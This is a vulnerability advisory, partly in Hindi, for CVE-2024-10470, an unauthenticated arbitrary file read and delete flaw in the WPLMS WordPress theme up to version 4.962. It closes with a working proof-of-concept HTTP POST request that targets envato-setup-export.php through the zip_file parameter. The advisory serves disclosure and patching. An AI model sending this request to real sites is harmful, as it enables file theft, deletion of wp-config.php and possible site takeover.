
WPLMS Learning Management System for WordPress <= 4.962 – अनधिकृत मनमानी फ़ाइल पढ़ना और हटाना
WPLMS वर्डप्रेस के लिए लर्निंग मैनेजमेंट सिस्टम <= 4.962 – बिना प्रमाणीकरण के मनमानी फ़ाइल पढ़ना और हटाना
WPLMS वर्डप्रेस के लिए लर्निंग मैनेजमेंट सिस्टम, वर्डप्रेस LMS थीम, सभी संस्करणों में 4.962 तक, readfile और unlink फ़ंक्शन में अपर्याप्त फ़ाइल पथ सत्यापन और अनुमति जाँच के कारण मनमानी फ़ाइल पढ़ने और हटाने में सक्षम है। इससे बिना प्रमाणीकरण वाले हमलावर सर्वर पर मनमानी फ़ाइलें हटा सकते हैं, जो सही फ़ाइल (जैसे wp-config.php) हटाए जाने पर आसानी से रिमोट कोड निष्पादन का कारण बन सकता है। थीम सक्रिय न होने पर भी असुरक्षित है।
Affected Theme: WPLMS Learning Management System for WordPress
Theme Slug: wplms
Affected Versions: <= 4.962
CVE ID: CVE-2024-10470
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Foxyyy
Fully Patched Version: 4.963
POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
download_export_zip=1&zip_file=.htaccess